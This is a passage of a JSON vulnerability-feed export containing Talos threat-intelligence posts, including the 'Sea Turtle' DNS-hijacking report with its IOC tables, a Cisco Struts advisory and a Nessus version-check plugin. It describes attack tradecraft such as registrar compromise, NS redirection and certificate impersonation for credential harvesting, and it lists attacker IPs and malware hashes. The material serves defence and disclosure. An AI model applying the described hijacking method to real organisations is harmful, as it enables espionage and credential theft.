malware:** \n \n121[.]207[.]227[.]84 \n125[.]77[.]30[.]184 \n \n**IP address and port hosting malware:** \n \n104[.]203[.]170[.]198:5522 \n \n**SHA256 of malware hosted on above IP address:** \n \n7f18c8beb8e37ce41de1619b2d67eb600ace062e23ac5a5d9a9b2b3dfaccf79b dac92c84ccbb88f058b61deadb34a511e320affa7424f3951169cba50d700500 e5a04653a3bfbac53cbb40a8857f81c8ec70927a968cb62e32fd36143a6437fc d3447f001a6361c8454c9e560a6ca11e825ed17f63813074621846c43d6571ba 709d04dd39dd7f214f3711f7795337fbb1c2e837dddd24e6d426a0d6c306618e 830db6a2a6782812848f43a4e1229847d92a592671879ff849bc9cf08259ba6a \n \n**Remaining actors:** \n \n**Attacking IP addresses:** \n \n111[.]19[.]78[.]4 \n15[.]231[.]235[.]194 \n221[.]203[.]81[.]226 \n111[.]73[.]45[.]90 \n121[.]207[.]227[.]84 \n125[.]77[.]30[.]184 \n \n\n\n", "cvss3": {}, "published": "2019-02-26T10:56:00", "type": "talosblog", "title": "Cisco Talos Honeypot Analysis Reveals Rise in Attacks on Elasticsearch Clusters", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2014-3120", "CVE-2015-1427", "CVE-2017-10271", "CVE-2018-1273", "CVE-2018-7600"], "modified": "2019-03-01T15:56:50", "id": "TALOSBLOG:3F14583676BF3FEC18226D8E465C8707", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/uGLhJU8rCm8/cisco-talos-honeypot-analysis-reveals.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-04-24T16:19:06", "description": "[](<https://3.bp.blogspot.com/-ksOHISXuYNU/XLX7wzGSHNI/AAAAAAAAAgI/Ffst6mMQLNIBQP1F1gRMNCYEu2-jdZr6ACEwYBhgL/s1600/image2.jpg>)\n\n \n \n_Authors: [Danny Adamitis](<https://twitter.com/dadamitis>), [David Maynor](<https://twitter.com/Dave_Maynor>), [Warren Mercer](<https://twitter.com/SecurityBeard>), [Matthew Olney ](<https://twitter.com/kpyke>)and [Paul Rascagneres](<https://twitter.com/r00tbsd>)._ \n_ \n_ \n_Update 4/18: _A correction has been made to our research based on feedback from Packet Clearing House, we thank them for their assistance \n \n\n\n## Preface\n\nThis blog post discusses the technical details of a state-sponsored attack manipulating DNS systems. While this incident is limited to targeting primarily national security organizations in the Middle East and North Africa, and we do not want to overstate the consequences of this specific campaign, we are concerned that the success of this operation will lead to actors more broadly attacking the global DNS system. DNS is a foundational technology supporting the Internet. Manipulating that system has the potential to undermine the trust users have on the internet. That trust and the stability of the DNS system as a whole drives the global economy. Responsible nations should avoid targeting this system, work together to establish an accepted global norm that this system and the organizations that control it are off-limits, and cooperate in pursuing those actors who act irresponsibly by targeting this system. \n \n \n\n\n## Executive Summary\n\nCisco Talos has discovered a new cyber threat campaign that we are calling \"Sea Turtle,\" which is targeting public and private entities, including national security organizations, located primarily in the Middle East and North Africa. The ongoing operation likely began as early as January 2017 and has continued through the first quarter of 2019. Our investigation revealed that at least 40 different organizations across 13 different countries were compromised during this campaign. We assess with high confidence that this activity is being carried out by an advanced, state-sponsored actor that seeks to obtain persistent access to sensitive networks and systems. \n \nThe actors behind this campaign have focused on using DNS hijacking as a mechanism for achieving their ultimate objectives. DNS hijacking occurs when the actor can illicitly modify DNS name records to point users to actor-controlled servers. The Department of Homeland Security (DHS) issued an [alert](<https://www.us-cert.gov/ncas/alerts/AA19-024A>) about this activity on Jan. 24 2019, warning that an attacker could redirect user traffic and obtain valid encryption certificates for an organization's domain names. \n \nIn the Sea Turtle campaign, Talos was able to identify two distinct groups of victims. The first group, we identify as primary victims, includes national security organizations, ministries of foreign affairs, and prominent energy organizations. The threat actor targeted third-party entities that provide services to these primary entities to obtain access. Targets that fall into the secondary victim category include numerous DNS registrars, telecommunication companies, and internet service providers. One of the most notable aspects of this campaign was how they were able to perform DNS hijacking of their primary victims by first targeting these third-party entities. \n \nWe assess with high confidence that these operations are distinctly different and independent from the operations performed by DNSpionage, which we [reported](<https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html>) on in November 2018. The Sea Turtle campaign almost certainly poses a more severe threat than DNSpionage given the actor's methodology in targeting various DNS registrars and registries. The level of access we presume necessary to engage in DNS hijacking successfully indicates an ongoing, high degree of threat to organizations in the targeted regions. Due to the effectiveness of this approach, we encourage all organizations, globally, to ensure they have taken steps to minimize the possibility of malicious actors duplicating this attack methodology. \n \nThe threat actors behind the Sea Turtle campaign show clear signs of being highly capable and brazen in their endeavors. The actors are responsible for the first [publicly confirmed](<https://www.netnod.se/news/statement-on-man-in-the-middle-attack-against-netnod>) case against an organizations that manages a root server zone, highlighting the attacker's sophistication. Notably, the threat actors have continued their attacks despite public reports documenting various aspects of their activity, suggesting they are unusually brazen and may be difficult to deter going forward. In most cases, threat actors typically stop or slow down their activities once their campaigns are publicly revealed. \n \nThis post provides the technical findings you would typically see in a Talos blog. We will also offer some commentary on the threat actor's tradecraft, including possible explanations about the actor's attack methodology and thought process. Finally, we will share the IOCs that we have observed thus far, although we are confident there are more that we have not seen. \n \n\n\n### Background on Domain Name Services and records management\n\nThe threat actors behind the Sea Turtle campaign were successful in compromising entities by manipulating and falsifying DNS records at various levels in the domain name space. This section provides a brief overview of where DNS records are managed and how they are accessed to help readers better understand how these events unfolded. \n \nThe first and most direct way to access an organization's DNS records is through the registrar with the registrant's credentials. These credentials are used to login to the DNS provider from the client-side, which is a registrar. If an attacker was able to compromise an organization's network administrator credentials, the attacker would be able to change that particular organization's DNS records at will. \n \nThe second way to access DNS records is through a DNS registrar, sometimes called registrar operators. A registrar sells domain names to the public and manages DNS records on behalf of the registrant through the domain registry. Records in the domain registry are accessed through the registry application using the Extensible Provisioning Protocol (EPP). EPP was detailed in the [request for comment (RFC) 5730](<https://tools.ietf.org/html/rfc5730>) as \"a means of interaction between a registrar's applications and registry applications.\" If the attackers were able to obtain one of these EPP keys, they would be able to modify any DNS records that were managed by that particular registrar. \n \nThe third approach to gain access to DNS records is through one of the registries. These registries manage any known TLD, such as entire country code top-level domains (ccTLDs) and generic top-level domains (gTLDs). For example, Verisign manages all entities associated with the top-level domain (TLD) \".com.\" All the different registry information then converges into one of [12 different](<https://www.iana.org/domains/root/servers>) organization that manage different parts of the domain registry root. The domain registry root is stored on 13 \"named authorities in the delegation data for the root zone,\" according to [ICANN](<https://www.icann.org/news/blog/there-are-not-13-root-servers>). \n \nFinally, actors could target root zone servers to modify the records directly. It is important to note that there is no evidence during this campaign (or any other we are aware of) that the root zone servers were attacked or compromised. We highlight this as a potential avenue that attackers would consider. The root DNS servers issued a [joint statement](<https://root-servers.org/news/20190314-Rootops_statement_Integrity_of_root_server_system.pdf>) that stated, \"There are no signs of lost integrity or compromise of the content of the root [server] zone\u2026There are no signs of clients having received unexpected responses from root servers.\" \n\n\n### Assessed Sea Turtle DNS hijacking methodology\n\nIt is important to remember that the DNS hijacking is merely a means for the attackers to achieve their primary objective. Based on observed behaviors, we believe the actor ultimately intended to steal credentials to gain access to networks and systems of interest. To achieve their goals, the actors behind Sea Turtle: \n\n\n 1. Established a means to control the DNS records of the target.\n 2. Modified DNS records to point legitimate users of the target to actor-controlled servers.\n 3. Captured legitimate user credentials when users interacted with these actor-controlled servers.\nThe diagram below illustrates how we believe the actors behind the Sea Turtle campaign used DNS hijacking to achieve their end goals. \n \n\n\n### Redirection Attack Methodology Diagram\n\n[](<http://2.bp.blogspot.com/-FQg4Ak28yDc/XLdL-8NlekI/AAAAAAAAAXw/wDpJRiXAEGEzPJo9bQ9PxqOG8rcGn6gWACK4BGAYYCw/s1600/DNSpionage-methodology-v2.png>)\n\n \n\n\n### Operational tradecraft\n\n#### Initial access\n\nThe threat actors behind the Sea Turtle campaign gained initial access either by exploiting known vulnerabilities or by sending spear-phishing emails. Talos believes that the threat actors have exploited multiple known CVEs to either gain initial access or to move laterally within an affected organization. Based on our research, we know the actor utilizes the following known exploits: \n\n\n * [CVE-2009-1151](<https://nvd.nist.gov/vuln/detail/CVE-2009-1151>): PHP code injection vulnerability affecting phpMyAdmin\n * [CVE-2014-6271](<https://nvd.nist.gov/vuln/detail/CVE-2014-6271>): RCE affecting GNU bash system, specifically the SMTP (this was part of the [Shellshock](<https://www.us-cert.gov/ncas/alerts/TA14-268A>) CVEs)\n * [CVE-2017-3881](<https://nvd.nist.gov/vuln/detail/CVE-2017-3881>): RCE by unauthenticated user with elevated privileges Cisco switches\n * [CVE-2017-6736](<https://nvd.nist.gov/vuln/detail/CVE-2017-6736>): Remote Code Exploit (RCE) for Cisco integrated Service Router 2811\n * [CVE-2017-12617](<https://nvd.nist.gov/vuln/detail/CVE-2017-12617>): RCE affecting Apache web servers running Tomcat\n * [CVE-2018-0296](<https://nvd.nist.gov/vuln/detail/CVE-2018-0296>): Directory traversal allowing unauthorized access to Cisco Adaptive Security Appliances (ASAs) and firewalls\n * [CVE-2018-7600](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>): RCE for Website built with Drupal, aka \"Drupalgeddon\"\nAs of early 2019, the only evidence of the spear-phishing threat vector came from a compromised organization's public disclosure. On January 4, Packet Clearing House, which is not an Internet exchange point but rather is an NGO which provides support to Internet exchange points and the core of the domain name system, provided confirmation of this aspect of the actors\u2019 tactics when it publicly revealed its internal DNS had been briefly hijacked as a consequence of the compromise at its domain registrar. \n \nAs with any initial access involving a sophisticated actor, we believe this list of CVEs to be incomplete. The actor in question can leverage known vulnerabilities as they encounter a new threat surface. This list only represents the observed behavior of the actor, not their complete capabilities. \n\n\n### Globalized DNS hijacking activity as an infection vector\n\nDuring a typical incident, the actor would modify the NS records for the targeted organization, pointing users to a malicious DNS server that provided actor-controlled responses to all DNS queries. The amount of time that the targeted DNS record was hijacked can range from a couple of minutes to a couple of days. This type of activity could give an attacker the ability to redirect any victim who queried for that particular domain around the world. [Other cybersecurity firms](<https://www.crowdstrike.com/blog/widespread-dns-hijacking-activity-targets-multiple-sectors/>) previously reported some aspects of this activity. Once the actor-controlled name server was queried for the targeted domain, it would respond with a falsified \"A\" record that would provide the IP address of the actor-controlled MitM node instead of the IP address of the legitimate service. In some instances, the threat actors modified the time-to-live (TTL) value to one second. This was likely done to minimize the risk of any records remaining in the DNS cache of the victim machine. \n \nDuring 2019, we observe the following name servers being used in support of the Sea Turtle campaign: \n \n\n\n \n\n\n \n\n\nDomain\n\n| \n\nActive Timeframe \n \n---|--- \n \nns1[.]intersecdns[.]com\n\n| \n\nMarch - April 2019 \n \nns2[.]intersecdns[.]com\n\n| \n\nMarch - April 2019 \n \nns1[.]lcjcomputing[.]com\n\n| \n\nJanuary 2019 \n \nns2[.]lcjcomputing[.]com\n\n| \n\nJanuary 2019 \n \n \n\n\n \n\n\n### Credential harvesting: Man-in-the-middle servers\n\nOnce the threat actors accessed a domain's DNS records, the next step was to set up a man-in-the-middle (MitM) framework on an actor-controlled server. \n \nThe next step for the actor was to build MitM servers that impersonated legitimate services to capture user credentials. Once these credentials were captured, the user would then be passed to the legitimate service. to evade detection, the actors performed \"certificate impersonation,\" a technique in which the attacker obtained a certificate authority-signed X.509 certificate from another provider for the same domain imitating the one already used by the targeted organization. For example, if a DigiCert certificate protected a website, the threat actors would obtain a certificate for the same domain but from another provider, such as Let's Encrypt or Comodo. This tactic would make detecting the MitM attack more difficult, as a user's web browser would still display the expected \"SSL padlock\" in the URL bar. \n \nWhen the victim entered their password into the attacker's spoofed webpage, the actor would capture these credentials for future use. The only indication a victim received was a brief lag between when the user entered their information and when they obtained access to the service. This would also leave almost no evidence for network defenders to discover, as legitimate network credentials were used to access the accounts. \n \nIn addition to the MitM server IP addresses published in previous reports, Talos identified 16 additional servers leveraged by the actor during the observed attacks. The complete list of known malicious IP addresses are in the Indicators of Compromise (IOC) section below. \n\n\n### Credential harvesting with compromised SSL certificates\n\nOnce the threat actors appeared to have access to the network, they stole the organization's SSL certificate. The attackers would then use the certificate on actor-controlled servers to perform additional MitM operations to harvest additional credentials. This allowed the actors to expand their access into the targeted organization's network. The stolen certificates were typically only used for less than one day, likely as an operational security measure. Using stolen certificates for an extended period would increase the likelihood of detection. In some cases, the victims were redirected to these actor-controlled servers displaying the stolen certificate. \n \nOne notable aspect of the campaign was the actors' ability to impersonate VPN applications, such as Cisco Adaptive Security Appliance (ASA) products, to perform MitM attacks. At this time, we do not believe that the attackers found a new ASA exploit. Rather, they likely abused the trust relationship associated with the ASA's SSL certificate to harvest VPN credentials to gain remote access to the victim's network. This MitM capability would allow the threat actors to harvest additional VPN credentials. \n \nAs an example, DNS records indicate that a targeted domain resolved to an actor-controlled MitM server. The following day, Talos identified an SSL certificate with the subject common name of \"ASA Temporary Self Signed Certificate\" associated with the aforementioned IP address. This certificate was observed on both the actor-controlled IP address and on an IP address correlated with the victim organization. \n \nIn another case, the attackers were able to compromise NetNod, a non-profit, independent internet infrastructure organization based in Sweden. NetNod acknowledged the compromise in a [public statement](<https://www.netnod.se/news/statement-on-man-in-the-middle-attack-against-netnod>) on February 5, 2019. Using this access, the threat actors were able to manipulate the DNS records for sa1[.]dnsnode[.]net. This redirection allowed the attackers to harvest credentials of administrators who manage domains with the TLD of Saudi Arabia (.sa). It is likely that there are additional Saudi Arabia-based victims from this attack. \n \nIn one of the more recent campaigns on March 27, 2019, the threat actors targeted the Sweden-based consulting firm Cafax. On Cafax's [public webpage](<http://www.cafax.se/Home.html>), the company states that one of their consultants actively manages the i[.]root-server[.]net zone. NetNod managed this particular DNS server zone. We assess with high confidence that this organization was targeted in an attempt to re-establish access to the NetNod network, which was previously compromised by this threat actor. \n\n\n### Primary and secondary victims\n\n[](<https://4.bp.blogspot.com/-NQC457__bD8/XLX7w7QGGOI/AAAAAAAAAgA/3nx4TTK6U1oHms5gRhGQRaw6TGmTo1H-ACEwYBhgL/s1600/image1.jpg>)\n\n \n \nWe identified 40 different organizations that have been targeted during this campaign. The victim organizations appear to be broadly grouped into two different categories. The first group of victims, which we refer to as primary victims, were almost entirely located in the Middle East and North Africa. Some examples of organizations that were compromised include: \n\n\n * Ministries of foreign affairs\n * Military organizations\n * Intelligence agencies\n * Prominent energy organizations\nThe second cluster of victim organizations were likely compromised to help enable access to these primary targets. These organizations were located around the world; however, they were mostly concentrated in the Middle East and North Africa. Some examples of organizations that were compromised include: \n\n\n * Telecommunications organizations\n * Internet service providers\n * Information technology firms\n * Registrars\n * One registry\n \nNotably, the threat actors were able to gain access to registrars that manage ccTLDs for Amnic, which is listed as the technical contact on [IANA](<https://www.iana.org/domains/root/db/am.html>) for the ccTLD .am. Obtaining access to this ccTLD registrars would have allowed attackers to hijack any domain that used those ccTLDs. \n\n\n### How is this tradecraft different?\n\nThe threat actors behind the Sea Turtle campaign have proven to be highly capable, as they have been able to perform operations for over two years and have been undeterred by public reports documenting various aspects of their activity. This cyber threat campaign represents the first known case of a domain name registry organization that was compromised for cyber espionage operations. \n \nIn order to distinguish this activity from the previous reporting on other attackers, such as those affiliated with DNSpionage, below is a list of traits that are unique to the threat actors behind the Sea Turtle campaign: \n\n\n * These actors perform DNS hijacking through the use of actor-controlled name servers.\n * These actors have been more aggressive in their pursuit targeting DNS registries and a number of registrars, including those that manage ccTLDs.\n * These actors use Let's Encrypts, Comodo, Sectigo, and self-signed certificates in their MitM servers to gain the initial round of credentials.\n * Once they have access to the network, they steal the organization's legitimate SSL certificate and use it on actor-controlled servers.\n\n### Why was it so successful?\n\nWe believe that the Sea Turtle campaign continues to be highly successful for several reasons. First, the actors employ a unique approach to gain access to the targeted networks. Most traditional security products such as IDS and IPS systems are not designed to monitor and log DNS requests. The threat actors were able to achieve this level of success because the DNS domain space system added security into the equation as an afterthought. Had more ccTLDs implemented security features such as registrar locks, attackers would be unable to redirect the targeted domains. \n \nThe threat actors also used an interesting techniques called certificate impersonation. This technique was successful in part because the SSL certificates were created to provide confidentiality, not integrity. The attackers stole organizations' SSL certificates associated with security appliances such as ASA to obtain VPN credentials, allowing the actors to gain access to the targeted network. \n \nThe threat actors were able to maintain long term persistent access to many of these networks by utilizing compromised credentials. \n \nWe will continue to monitor Sea Turtle and work with our partners to understand the threat as it continues to evolve to ensure that our customers remain protected and the public is informed. \n \n\n\n### Mitigation strategy\n\nIn order to best protect against this type of attack, we compiled a list of potential actions. Talos suggests using a registry lock service, which will require an out-of-band message before any changes can occur to an organization's DNS record. If your registrar does not offer a registry lock service, we recommend implementing multi-factor authentication, such as [DUO](<https://www.cisco.com/c/en/us/products/security/adaptive-multi-factor-authentication.html>), to access your organization's DNS records. If you suspect you were targeted by this type of activity intrusion, we recommend instituting a network-wide password reset, preferably from a computer on a trusted network. Lastly, we recommend applying patches, especially on internet-facing machines. Network administrators can monitor passive DNS record on their domains, to check for abnormalities. \n \n\n\n### Coverage\n\nCVE-2009-1151: PHP code injection vulnerability affecting phpMyAdmin \nSID: [2281](<https://snort.org/rule_docs/1-2281>) \n \nCVE-2014-6271: RCE affecting GNU bash system, specific the SMTP (this was part of the Shellshock CVEs) \nSID: [31975](<https://snort.org/rule_docs/1-31975>) \\- [31978](<https://snort.org/rule_docs/1-31978>), [31985](<https://snort.org/rule_docs/1-31985>), [32038](<https://snort.org/rule_docs/1-32038>), [32039](<https://snort.org/rule_docs/1-32039>), [32041](<https://snort.org/rule_docs/1-32041>) \\- [32043](<https://snort.org/rule_docs/1-32043>), [32069](<https://snort.org/rule_docs/1-32069>), [32335](<https://snort.org/rule_docs/1-32335>), [32336](<https://snort.org/rule_docs/1-32336>) \n \nCVE-2017-3881: RCE for Cisco switches \nSID: [41909](<https://snort.org/rule_docs/1-41909>) \\- [41910](<https://snort.org/rule_docs/1-41910>) \n \nCVE-2017-6736: Remote Code Exploit (RCE) for Cisco integrated Service Router 2811 \nSID: [43424](<https://snort.org/rule_docs/3-43424>) \\- [43432](<https://snort.org/rule_docs/3-43432>) \n \nCVE-2017-12617: RCE affecting Apache web servers running Tomcat \nSID: [44531](<https://snort.org/rule_docs/1-44531>) \n \nCVE-2018-0296: Directory traversal to gain unauthorized access to Cisco Adaptive Security Appliances (ASAs) and Firewalls \nSID: 46897 \n \nCVE-2018-7600: RCE for Website built with Drupal aka \"Drupalgeddon\" \nSID: [46316](<https://snort.org/rule_docs/1-46316>) \n\n\n### Indicators of Compromise\n\nThe threat actors utilized leased IP addresses from organizations that offer virtual private server (VPS) services. These VPS providers have since resold many of these IP addresses to various benign customers. To help network defenders, we have included the IP address, as well as the month(s) that the IP address was associated with the threat actor. \n \n** \n** \n\n\n**IP address**\n\n| \n\n**Month**\n\n| \n\n**Year**\n\n| \n\n**Country of targets** \n \n---|---|---|--- \n \n199.247.3.191\n\n| \n\nNovember\n\n| \n\n2018\n\n| \n\nAlbania, Iraq \n \n37.139.11.155\n\n| \n\nNovember\n\n| \n\n2018\n\n| \n\nAlbania, UAE \n \n185.15.247.140\n\n| \n\nJanuary\n\n| \n\n2018\n\n| \n\nAlbania \n \n206.221.184.133\n\n| \n\nNovember\n\n| \n\n2018\n\n| \n\nEgypt \n \n188.166.119.57\n\n| \n\nNovember\n\n| \n\n2018\n\n| \n\nEgypt \n \n185.42.137.89\n\n| \n\nNovember\n\n| \n\n2018\n\n| \n\nAlbania \n \n82.196.8.43\n\n| \n\nOctober\n\n| \n\n2018\n\n| \n\nIraq \n \n159.89.101.204\n\n| \n\nDecember - January\n\n| \n\n2018-2019\n\n| \n\nTurkey, Sweden, Syria, Armenia, US \n \n146.185.145.202\n\n| \n\nMarch\n\n| \n\n2018\n\n| \n\nArmenia \n \n178.62.218.244\n\n| \n\nDecember - January\n\n| \n\n2018-2019\n\n| \n\nUAE, Cyprus \n \n139.162.144.139\n\n| \n\nDecember \n\n| \n\n2018\n\n| \n\nJordan \n \n142.54.179.69\n\n| \n\nJanuary - February \n\n| \n\n2017\n\n| \n\nJordan \n \n193.37.213.61\n\n| \n\nDecember\n\n| \n\n2018\n\n| \n\nCyprus \n \n108.61.123.149\n\n| \n\nFebruary\n\n| \n\n2019\n\n| \n\nCyprus \n \n212.32.235.160\n\n| \n\nSeptember\n\n| \n\n2018\n\n| \n\nIraq \n \n198.211.120.186\n\n| \n\nSeptember\n\n| \n\n2018\n\n| \n\nIraq \n \n146.185.143.158\n\n| \n\nSeptember\n\n| \n\n2018\n\n| \n\nIraq \n \n146.185.133.141\n\n| \n\nOctober\n\n| \n\n2018\n\n| \n\nLibya \n \n185.203.116.116\n\n| \n\nMay\n\n| \n\n2018\n\n| \n\nUAE \n \n95.179.150.92\n\n| \n\nNovember\n\n| \n\n2018\n\n| \n\nUAE \n \n174.138.0.113\n\n| \n\nSeptember\n\n| \n\n2018\n\n| \n\nUAE \n \n128.199.50.175\n\n| \n\nSeptember\n\n| \n\n2018\n\n| \n\nUAE \n \n139.59.134.216\n\n| \n\nJuly - December\n\n| \n\n2018\n\n| \n\nUnited States, Lebanon \n \n45.77.137.65\n\n| \n\nMarch - April\n\n| \n\n2019\n\n| \n\nSyria, Sweden \n \n142.54.164.189\n\n| \n\nMarch - April\n\n| \n\n2019\n\n| \n\nSyria \n \n199.247.17.221\n\n| \n\nMarch \n\n| \n\n2019\n\n| \n\nSweden \n \n** \n** \n\n\nThe following list contains the threat actor name server domains and their IP address.\n\n \n\n\nDomain\n\n| \n\nActive Timeframe\n\n| \n\nIP address \n \n---|---|--- \n \nns1[.]intersecdns[.]com\n\n| \n\nMarch - April 2019\n\n| \n\n95.179.150.101 \n \nns2[.]intersecdns[.]com\n\n| \n\nMarch - April 2019\n\n| \n\n95.179.150.101 \n \nns1[.]lcjcomputing[.]com\n\n| \n\nJanuary 2019 \n\n| \n\n95.179.150.101 \n \nns2[.]lcjcomputing[.]com\n\n| \n\nJanuary 2019 \n\n| \n\n95.179.150.101 \n \n", "cvss3": {}, "published": "2019-04-18T16:08:25", "type": "talosblog", "title": "DNS Hijacking Abuses Trust In Core Internet Service", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2009-1151", "CVE-2014-6271", "CVE-2017-12617", "CVE-2017-3881", "CVE-2017-6736", "CVE-2018-0296", "CVE-2018-7600"], "modified": "2019-04-18T16:08:25", "id": "TALOSBLOG:A09C50A444F2D7D6A5D4552C85316387", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/GSxJP9GzlhI/seaturtle.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cisco": [{"lastseen": "2023-06-24T08:38:32", "description": "A vulnerability in Apache Struts could allow an unauthenticated, remote attacker to execute arbitrary code on a targeted system.\n\nThe vulnerability exists because the affected software insufficiently validates user-supplied input, allowing the use of results with no namespace value and the use of url tags with no value or action. In cases where upper actions or configurations also have no namespace or a wildcard namespace, an attacker could exploit this vulnerability by sending a request that submits malicious input to the affected application for processing. If successful, the attacker could execute arbitrary code in the security context of the affected application on the targeted system.\nThe following Snort rules can be used to detect possible exploitation of this vulnerability: Snort SID 29639, 39190, 39191, and 47634\n\nThis advisory is available at the following link:\nhttps://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180823-apache-struts [\"https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180823-apache-struts\"]", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-23T20:00:00", "type": "cisco", "title": "Apache Struts Remote Code Execution Vulnerability Affecting Cisco Products: August 2018", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2018-09-17T18:52:00", "id": "CISCO-SA-20180823-APACHE-STRUTS", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180823-apache-struts", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-05-20T14:39:40", "description": "The version of Apache Struts running on the remote host is 2.3.x prior to 2.3.35, or 2.5.x prior to 2.5.17. It, therefore, contains a possible remote code execution vulnerability when results are used without setting a namespace along with an upper action that does not have a namespace set or has a wildcard namespace set.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2018-08-22T00:00:00", "type": "nessus", "title": "Apache Struts CVE-2018-11776 Results With No Namespace Possible Remote Code Execution (S2-057)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_5_17.NASL", "href": "https://www.tenable.com/plugins/nessus/112036", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(112036);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2018-11776\");\n script_bugtraq_id(105125);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Apache Struts CVE-2018-11776 Results With No Namespace Possible Remote Code Execution (S2-057)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host uses a Java framework\nthat is affected by a possible remote code execution.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is 2.3.x\nprior to 2.3.35, or 2.5.x prior to 2.5.17. It, therefore, contains a\npossible remote code execution vulnerability when results are used\nwithout setting a namespace along with an upper action that does not\nhave a namespace set or has a wildcard namespace set.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-057\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2018/Aug/46\");\n script_set_attribute(attribute:\"see_also\", value:\"https://semmle.com/news/apache-struts-CVE-2018-11776\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lgtm.com/blog/apache_struts_CVE-2018-11776\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.35 or 2.5.17 or later\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11776\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Struts 2 Multiple Tags Result Namespace Handling RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Namespace Redirect OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\", \"struts_config_browser_detect.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\napp_info = vcf::combined_get_app_info(app:\"Apache Struts\");\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { \"min_version\" : \"2.3\", \"max_version\" : \"2.3.34\", \"fixed_version\" : \"2.3.35\" },\n { \"min_version\" : \"2.5\", \"max_version\" : \"2.5.16\", \"fixed_version\" : \"2.5.17\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-18T15:45:00", "description": "The version of Apache 